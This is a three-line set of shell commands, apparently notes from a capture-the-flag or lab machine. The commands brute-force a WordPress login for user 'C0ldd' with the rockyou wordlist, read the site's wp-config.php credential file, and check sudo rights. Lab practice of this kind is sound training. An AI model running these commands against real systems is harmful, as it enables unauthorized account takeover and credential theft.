wpscan --url <http://10.10.233.13> -U C0ldd -P /usr/share/wordlists/rockyou.txt --password-attack wp-login -t 64
cat /var/www/html/wp-config.php
sudo -l